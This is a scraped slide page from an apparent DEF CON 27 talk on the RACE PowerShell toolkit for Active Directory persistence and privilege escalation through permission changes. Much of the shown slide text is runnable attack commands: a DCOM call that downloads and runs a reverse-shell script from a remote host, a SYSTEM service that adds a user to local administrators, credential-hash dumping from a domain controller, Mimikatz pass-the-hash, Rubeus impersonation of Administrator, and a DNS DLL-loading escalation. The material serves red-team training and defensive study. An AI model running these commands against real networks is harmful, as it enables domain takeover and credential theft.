Open shift deployment review getting ready for day 2 operationsHendrik van Run
74 views30 slides
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation by
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
1.2K views82 slides
How HashiCorp platform tools can make the difference in development and deplo... by
How HashiCorp platform tools can make the difference in development and deplo...How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...Dmytro Mykhailov
249 views31 slides

Similar to RACE - Minimal Rights and ACE for Active Directory Dominance(20)

BSides SG Practical Red Teaming Workshop by Ajay Choudhary
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
Ajay Choudhary673 views
Exploiting Active Directory Administrator Insecurities by Priyanka Aash
Exploiting Active Directory Administrator InsecuritiesExploiting Active Directory Administrator Insecurities
Exploiting Active Directory Administrator Insecurities
Priyanka Aash246 views
2019 Blackhat Booth Presentation - PowerUpSQL by Scott Sutherland
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
Scott Sutherland831 views
Open shift deployment review getting ready for day 2 operations by Hendrik van Run
Open shift deployment review   getting ready for day 2 operationsOpen shift deployment review   getting ready for day 2 operations
Open shift deployment review getting ready for day 2 operations
Hendrik van Run74 views
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation by Scott Sutherland
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
Scott Sutherland1.2K views
How HashiCorp platform tools can make the difference in development and deplo... by Dmytro Mykhailov
How HashiCorp platform tools can make the difference in development and deplo...How HashiCorp platform tools can make the difference in development and deplo...
How HashiCorp platform tools can make the difference in development and deplo...
Dmytro Mykhailov249 views
Was liberty at scale by sflynn073
Was liberty at scaleWas liberty at scale
Was liberty at scale
sflynn0731.3K views
Presentation database security enhancements with oracle by xKinAnx
Presentation   database security enhancements with oraclePresentation   database security enhancements with oracle
Presentation database security enhancements with oracle
xKinAnx812 views
What's new in IBM MQ Messaging by MarkTaylorIBM
What's new in IBM MQ MessagingWhat's new in IBM MQ Messaging
What's new in IBM MQ Messaging
MarkTaylorIBM2.5K views
Up is Down, Black is White: Using SCCM for Wrong and Right by enigma0x3
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
enigma0x36.5K views
Automation Cloud Series - Mastering the Automation Cloud Admin experience_Ses... by Rohit Radhakrishnan
Automation Cloud Series - Mastering the Automation Cloud Admin experience_Ses...Automation Cloud Series - Mastering the Automation Cloud Admin experience_Ses...
Automation Cloud Series - Mastering the Automation Cloud Admin experience_Ses...
VMworld 2015: Automating Everything VMware with PowerCLI- Deep Dive by VMworld
VMworld 2015: Automating Everything VMware with PowerCLI- Deep DiveVMworld 2015: Automating Everything VMware with PowerCLI- Deep Dive
VMworld 2015: Automating Everything VMware with PowerCLI- Deep Dive
VMworld635 views
Chaos engineering with Litmus Chaos Framework by Anshul Patel
Chaos engineering with Litmus Chaos FrameworkChaos engineering with Litmus Chaos Framework
Chaos engineering with Litmus Chaos Framework
Anshul Patel532 views
API Tips & Tricks - Policy Management and Elastic Deployment by Axway
API Tips & Tricks - Policy Management and Elastic DeploymentAPI Tips & Tricks - Policy Management and Elastic Deployment
API Tips & Tricks - Policy Management and Elastic Deployment
Axway614 views
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 by Scott Sutherland
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
Scott Sutherland9.7K views
Helpful Juniper Tips and Tricks for New Network Engineers by Lizbeth E. Melendez
Helpful Juniper Tips and Tricks for New Network EngineersHelpful Juniper Tips and Tricks for New Network Engineers
Helpful Juniper Tips and Tricks for New Network Engineers
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon by Sanjiv Kawa
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
Sanjiv Kawa44 views
VMworld 2013: PowerCLI Best Practices - A Deep Dive by VMworld
VMworld 2013: PowerCLI Best Practices - A Deep DiveVMworld 2013: PowerCLI Best Practices - A Deep Dive
VMworld 2013: PowerCLI Best Practices - A Deep Dive
VMworld2.3K views

More from Nikhil Mittal

Workshop: PowerShell for Penetration Testers by
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
1.2K views53 slides
Continuous intrusion: Why CI tools are an attacker’s best friends by
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friendsNikhil Mittal
1.8K views65 slides
Powerpreter: Post Exploitation like a Boss by
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
8.7K views20 slides
Kautilya: Teensy beyond shell by
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
3K views48 slides
Teensy Programming for Everyone by
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
3.8K views56 slides
More fun using Kautilya by
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
2.5K views30 slides

More from Nikhil Mittal(8)

Workshop: PowerShell for Penetration Testers by Nikhil Mittal
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
Nikhil Mittal1.2K views
Continuous intrusion: Why CI tools are an attacker’s best friends by Nikhil Mittal
Continuous intrusion: Why CI tools are an attacker’s best friendsContinuous intrusion: Why CI tools are an attacker’s best friends
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal1.8K views
Powerpreter: Post Exploitation like a Boss by Nikhil Mittal
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a Boss
Nikhil Mittal8.7K views
Kautilya: Teensy beyond shell by Nikhil Mittal
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal3K views
Teensy Programming for Everyone by Nikhil Mittal
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
Nikhil Mittal3.8K views
More fun using Kautilya by Nikhil Mittal
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
Nikhil Mittal2.5K views
Hacking the future with USB HID by Nikhil Mittal
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HID
Nikhil Mittal4.2K views
Owning windows 8 with human interface devices by Nikhil Mittal
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
Nikhil Mittal2.2K views

Recently uploaded

The Power of Heat Decarbonisation Plans in the Built Environment by
The Power of Heat Decarbonisation Plans in the Built EnvironmentThe Power of Heat Decarbonisation Plans in the Built Environment
The Power of Heat Decarbonisation Plans in the Built EnvironmentIES VE
67 views20 slides
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...ShapeBlue
105 views15 slides
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T by
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TCloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TShapeBlue
81 views34 slides
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue by
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueCloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueShapeBlue
63 views15 slides
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ... by
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...ShapeBlue
97 views28 slides
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by
Extending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPoolShapeBlue
56 views10 slides

Recently uploaded(20)

The Power of Heat Decarbonisation Plans in the Built Environment by IES VE
The Power of Heat Decarbonisation Plans in the Built EnvironmentThe Power of Heat Decarbonisation Plans in the Built Environment
The Power of Heat Decarbonisation Plans in the Built Environment
IES VE67 views
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by ShapeBlue
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
ShapeBlue105 views
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T by ShapeBlue
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TCloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
ShapeBlue81 views
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue by ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueCloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
ShapeBlue63 views
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ... by ShapeBlue
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
ShapeBlue97 views
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by ShapeBlue
Extending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage -  Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
ShapeBlue56 views
Centralized Logging Feature in CloudStack using ELK and Grafana - Kiran Chava... by ShapeBlue
Centralized Logging Feature in CloudStack using ELK and Grafana - Kiran Chava...Centralized Logging Feature in CloudStack using ELK and Grafana - Kiran Chava...
Centralized Logging Feature in CloudStack using ELK and Grafana - Kiran Chava...
ShapeBlue74 views
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha... by ShapeBlue
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
ShapeBlue113 views
Data Integrity for Banking and Financial Services by Precisely
Data Integrity for Banking and Financial ServicesData Integrity for Banking and Financial Services
Data Integrity for Banking and Financial Services
Precisely76 views
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue by ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlueVNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
VNF Integration and Support in CloudStack - Wei Zhou - ShapeBlue
ShapeBlue134 views
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive by Network Automation Forum
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveAutomating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or... by ShapeBlue
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...
Zero to Cloud Hero: Crafting a Private Cloud from Scratch with XCP-ng, Xen Or...
ShapeBlue128 views
NTGapps NTG LowCode Platform by Mustafa Kuğu
NTGapps NTG LowCode Platform NTGapps NTG LowCode Platform
NTGapps NTG LowCode Platform
Mustafa Kuğu287 views
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online by ShapeBlue
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
ShapeBlue154 views
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas... by Bernd Ruecker
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
Bernd Ruecker50 views
Why and How CloudStack at weSystems - Stephan Bienek - weSystems by ShapeBlue
Why and How CloudStack at weSystems - Stephan Bienek - weSystemsWhy and How CloudStack at weSystems - Stephan Bienek - weSystems
Why and How CloudStack at weSystems - Stephan Bienek - weSystems
ShapeBlue172 views
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda... by ShapeBlue
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
Hypervisor Agnostic DRS in CloudStack - Brief overview & demo - Vishesh Jinda...
ShapeBlue93 views
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT by ShapeBlue
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBITUpdates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
Updates on the LINSTOR Driver for CloudStack - Rene Peinthor - LINBIT
ShapeBlue138 views
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... by James Anderson
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
James Anderson142 views

RACE - Minimal Rights and ACE for Active Directory Dominance

  • 1. RACE - Minimal Rights and ACE for Active Directory Dominance Nikhil Mittal
  • 2. About me • Hacker, Red Teamer, Trainer, Speaker at AlteredSecurity and PentesterAcademy.com • Twitter - @nikhil_mitt • Blog – https://labofapenetrationtester.com • Github - https://github.com/samratashok/ • Creator of Nishang, Deploy-Deception and Kautilya. • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks and/or Trainings • DefCon, BlackHat, CanSecWest, BruCON and more. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 2
  • 3. Agenda • Introduction to ACE/ACLs • The philosophy of Minimal Permissions • Introduction to the RACE toolkit • Persistence • On-demand privilege escalation • Domain Controller specific attacks • Defences Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 3
  • 4. Introduction to ACE • When a thread requests access to a resource (securable object), the system looks for permissions in a list for to the users and groups identified in the thread's access token. • The list is called Discretionary Access Control List (DACL). • This list is made of Access Control Entries (ACEs). • Each ACE contains access rights for a trustee. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 4
  • 5. The philosophy of Minimal Permissions • 'FullControl' is awesome but not always required. Same goes for the 'administrative' rights. • Why not stick with what we need for a specific task? • Let's say we want to Reset Password of a domain user. • By default, only Domain Administrators can do it. • Ask yourself - What minimum permissions do I need to Reset Password? Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 5
  • 6. The philosophy of Minimal Permissions • Similarly, what permissions or rights are actually required for PowerShell Remoting? • Administrators have FullControl permissions over the Microsoft.PowerShell session configuration. • If we add permissions for a user who has all the permissions but FullControl - we can access the machine over PowerShell Remoting even without Administrator privileges! Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 6
  • 7. The philosophy of Minimal Permissions • Throughout the talk, we will focus on using Minimal permissions to get access to securable objects without having to modify group memberships or user rights of the user we control. • We will avoid the FullControl permission wherever possible. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 7
  • 8. Introducing the RACE toolkit • Introducing the RACE toolkit! A PowerShell module which has commands to easily use any of the persistence and privilege escalation methods we are about to discuss. https://github.com/samratashok/RACE • RACE makes use of Microsoft's ActiveDirectory module for some of the attacks. You can get it from the below link (or from a server with AD RSAT) : https://github.com/samratashok/ADModule Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 8
  • 9. Persistence and Privilege Escalation • When we discuss persistence, local administrator or Domain Admin (in case of DC) privileges are assumed. • For on demand Privilege Escalation, we assume administrative access initially and we try to get those privileges back coupled with persistence. • Let's begin with very simple techniques. We will keep moving on to somewhat complex and lesser known techniques as we move ahead. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 9
  • 10. Persistence - PowerShell Remoting • To allow code execution without administrator rights, we can modify the ACL of PSSession configuration for 'Microsoft.PowerShell' • Not easy to discover as changes to ACL of PSSession configurations are rarely monitored. • Below command from RACE toolkit (when run as a user with admin privileges on ops-mssql) provides labuser privileges to access it: Set-RemotePSRemoting -ComputerName ops-mssql - SamAccountName labuser –Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 10
  • 11. Demo Modify PowerShell Remoting permissions on DC Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 11
  • 12. Persistence - WMI • To allow code execution without administrator rights, we can modify the ACL of DCOM and WMI namespaces. • Like PSRemoting, these ACLs are rarely monitored. • We can also make calls to custom WMI providers which provide extended command execution and code injection capabilities. • Below command (when run as a user with admin privileges on ops- mssql) provides labuser privileges to access ops-mssql: Set-RemoteWMI -ComputerName ops-mssql -SamAccountName labuser –Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 12
  • 13. Persistence - WMI Permanent Event Consumers (Partially Successful) • By modifying the ACL of the rootsubscription namespace in WMI, we can register WMI Permanent Event Consumers. • While experimenting with this, I found out that the event's payload was never executed. • Someone with a better understanding of event consumers in WMI may like to further investigate ;) Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 13
  • 14. On demand Privilege Escalation - Services • With admin privileges, we can modify permissions for a service to allow remote access. • It is also possible to create new services or change service account for existing services. • With sufficient permissions on services, we can abuse Services which run as SYSTEM to execute commands. • Note that this will not be silent in the logs! Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 14
  • 15. On demand Privilege Escalation - Services - Service Control Manager • Service Control Manager (SCM) provides the ability to create, configure, start and stop other services on a machine. • Like any other service, it has ACL which is very useful for an attacker. • For example, with GenericALL permission over SCM, it is possible to create a new service which runs as SYSTEM on the target machine. • We can then set permissions for the new service so that it can be configured and abused remotely. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 15
  • 16. On demand Privilege Escalation - Services - Service Control Manager • Run the following commands from RACE with administrative privileges for ops-mssql: • Provide labuser admin equivalent rights on scmanager on the target machine Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName scmanager -Verbose • Create a new service 'evilsvc' which runs as LocalSystem and labuser has permissions to start it. The service adds proxyuser to the local adminstrators group on start. Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'opsproxyuser' -CreateService evilsvc -SamAccountName labuser - Verbose Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvc -ComputerName ops-mssql • From the attacker's machine as labuser (adds opsproxyuser to local administrators group): sc.exe ops-mssql start evilsvc Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 16
  • 17. On demand Privilege Escalation - Services - Other Services • With admin equivalent permissions (CCDCLCSWRPWPDTLOCRSDRCWDWO) on any service, we can abuse it to escalate privileges. • Run the following command with administrative privileges on the target machine to provide labuser permissions over ALG service: Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName ALG -Verbose • As lab user, run the following command to configure ALG to run as SYSTEM and start the service (adds opslabuser to the local administrators group): Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'opslabuser' -ServiceName ALG -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 17
  • 18. Demo Modifying service Permissions Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 18
  • 19. Remote Registry • Remote Registry provides very interesting opportunities for code execution and retrieval of secrets from the target's registry. • There are multiple ways of achieving code persistence and privilege escalation by modifying permissions of registry keys like Image File Execution, Run keys and other Autoruns. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 19
  • 20. On demand Privilege Escalation - Remote Registry • With administrative privileges on the target machine, run the following to modify permissions for remote registry (HKLM: SYSTEMCurrentControlSetControlSecurePipeServerswinreg) and registry keys for sethc.exe: Set-RemoteRegistryPermissions -SamAccountName labuser - ComputerName ops-mssql -Verbose Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose • Note that the above command also disables Network Level Authentication (NLA) on the target machine. • This is noisy in the logs. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 20
  • 21. Persistence - DCOM • We can modify the ACL for DCOM to achieve code execution without needing administrator privileges. Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose • Then, execute the below command as labuser: Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)' Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 21
  • 22. On demand Privilege Escalation - Just Enough Administration (JEA) • JEA is a PowerShell v5 feature which provides control over administrative tasks by providing a PowerShell Remoting Endpoint with: − Virtual accounts - temporary local accounts which are local admin on member machines and DA on DCs but no rights to manage resources on network. − Ability to limit the cmdlets and commands which a user can run through Role Capabilities. • It is designed to 'allow non-admins to do some admin tasks'. That is precisely what we have been doing! • We will create a new JEA endpoint which provides our user administrator privileges. • The endpoint creation does not create any special logs but when we access the target machine there will be access logs for the virtual account (WinRM Virtual UsersWinRM_VA_AccountNumber_domain_username) Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 22
  • 23. On demand Privilege Escalation - Just Enough Administration (JEA) • If we have administrative privileges on a machine, we can create a JEA endpoint which provides us access to that machine using PowerShell Remoting. Set-JEAPermissions -ComputerName ops-build - SamAccountName labuser -Verbose • From the attacker's machine, as labuser, run: Enter-PSSession -ComputerName ops-build - ConfigurationName microsoft.powershell64 Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 23
  • 24. Demo Create JEA endpoint on DC Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 24
  • 25. Persistence - Registry • Since Windows registry stores some credentials, by modifying some of the registry keys, we can access Machine account hash, local users hash and cached domain credentials without administrator privileges. • We need to modify permissions of registry keys which store the secrets in multiple registry keys under : − HKLM: SYSTEMCurrentControlSetControlLsa − HKLM:Security − HKLM:SAM • Then, by modifying ACL of Remote Registry, PowerShell Remoting or WMI we can extract the secrets from the target machine. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 25
  • 26. Persistence - Registry • Currently, RACE uses the code from the DAMP toolkit (https://github.com/HarmJ0y/DAMP/) for this. • Using DAMP, with administrative privileges on the target: Add-RemoteRegBackdoor -ComputerName ops-dc -Trustee labuser -Verbose • As labuser, retrieve machine account hash: Get-RemoteMachineAccountHash -ComputerName ops-dc -Verbose • Retrieve local account hash: Get-RemoteLocalAccountHash -ComputerName ops-dc -Verbose • Retrieve domain cached credentials: Get-RemoteCachedCredential -ComputerName ops-dc -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 26
  • 27. Persistence - PowerShell Remoting and WMI • If there is no access to the Remote Registry Service, we can use PowerShell remoting or WMI to access the same set of credentials by modifying respective ACLs. • For example, after modifying PowerShell ACLs and modifying registry key permissions on ops-dc: $opsdc = New-PSSession -ComputerName ops-dc Invoke-Command -FilePath C:RACE-masterRACE.ps1 -Session $opsdc Enter-PSSession $opsdc Get-RemoteMachineAccountHash Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 27
  • 28. Demo Use PowerShell Remoting to dump DC machine hash Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 28
  • 29. Persistence - Registry • Once we have access to a machine using any of the discussed methods, there are so many opportunities. • What can we do with access to machine using PSRemoting or WMI or Remote Registry without admin privileges? Lot of things! • For example, if AutoLogon credentials are in use, we can read them from Registry without a need to modify any permission other than access to the target machine. Get-Item 'HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon' Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 29
  • 30. On demand Privilege Escalation DC - DNSAdmins • DNSAdmins is an AD security group. • By default, the members of this group have Read, Write, Create All Child objects, Delete Child objects, Special Permissions on the DNS Server object. • With membership of this group (and DNS service restart rights), it is possible to load arbitrary DLL from a UNC path in the DNS service. • If a Domain Controller is running the DNS service, this means SYSTEM privileges on the DC. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 30
  • 31. On demand Privilege Escalation DC - DNSAdmins • Once we have DA privileges, we can modify the DACL of the DNS Server object and restart permissions on the DNS service. • This allows us to load an arbitrary DLL with privileges of the DNS Service! • Also, DNSAdmins is not one of the Protected Groups (ACL not protected by AdminSDHolder). So we can even modify it's own ACL to add/remove members at will. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 31
  • 32. On demand Privilege Escalation DC - DNSAdmins • Use the below command to change the ACL of the DNS Server object in AD to add GenericRead and GenericWrite for the attacker controlled user (needs ActiveDirectory module). The command also adds restart permissions for DNS service : Set-DNSAbusePermissions -SAMAccountName labuser - DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell ,DC=local' -ComputerName ops-dc -Verbose • On the attacker's machine (needs DNSServer module from DNS RSAT): Invoke-DNSAbuse -ComputerName ops-dc -DLLPath ops- builddllmimilib.dll -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 32
  • 33. On demand Privilege Escalation DC - DSRM Admin • DSRM (Directory Services Restore Mode) administrator is a special 'local administrator' account on a DC. • It is possible to modify the behaviour of the DSRM administrator by creating/modifying the DsrmAdminLogonBehavior to 2 in the registry key HKLM:SystemCurrentControlSetControlLsa • With the above registry value and NTLM hash of the DSRM administrator, we can use Pass-The-Hash to access the DC. • We can extract the hash using mimikatz or from SAM hive. We can also modifying registry permissions as discussed previously. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 33
  • 34. On demand Privilege Escalation DC - DSRM Admin • Use the below command on DC as DA to set the logon behaviour of the DSRM administrator: Set-DCPermissions -Method DSRMAdmin -SAMAccountName labuser -Verbose • On attacker's machine: Invoke-Mimikatz -Command '"sekurlsa::pth /domain:ops-dc /user:Administrator /ntlm:<NTLMHash> /run:powershell.exe"' Enter-PSSession ops-dc -Authentication Negotiate Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 34
  • 35. Persistence DC - Resource-based Constrained Delegation • Resource-based Constrained Delegation enables the resource owner to set delegation to it. That is, it is the resource owner/administrator who decides which account can delegate to it unlike the traditional constrained delegation. • Due to this functionality, a simple Write permission on a computer object can be used to access the computer as ANY user (including DAs). Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 35
  • 36. Persistence DC - Resource-based Constrained Delegation • Run the below command on DC as DA to set write permissions on ops-file for labuser: Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS- FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' - SAMAccountName labuser -Verbose • Run the below command on the attacker's machine to allow delegation for 'attacker' machine account : Set-ADComputer -Identity ops-file - PrincipalsAllowedToDelegateToAccount ops-user31$ • Use Rubeus (https://github.com/GhostPack/Rubeus/) to get a TGS to access CIFS on ops-file as Administrator: .Rubeus.exe s4u /user:ops-user31$ /aes256: /msdsspn:cifs/ops-file /impersonateuser:administrator /ptt Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 36
  • 37. Persistence DC - Exchange Groups • MS Exchange installations changes the schema of the domain and also adds new groups. • Groups like Exchange Servers, Exchange Trusted Subsystem and Exchange Windows Permissions have interesting permissions. The groups are added in a new container 'Microsoft Exchange Security Groups' • The above are not Protected Groups so we can modify their ACLs. • Let's target the Exchange Windows Permissions group which has WriteDACL permission on the domain object (or even forest root domain object depending on the installation). Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 37
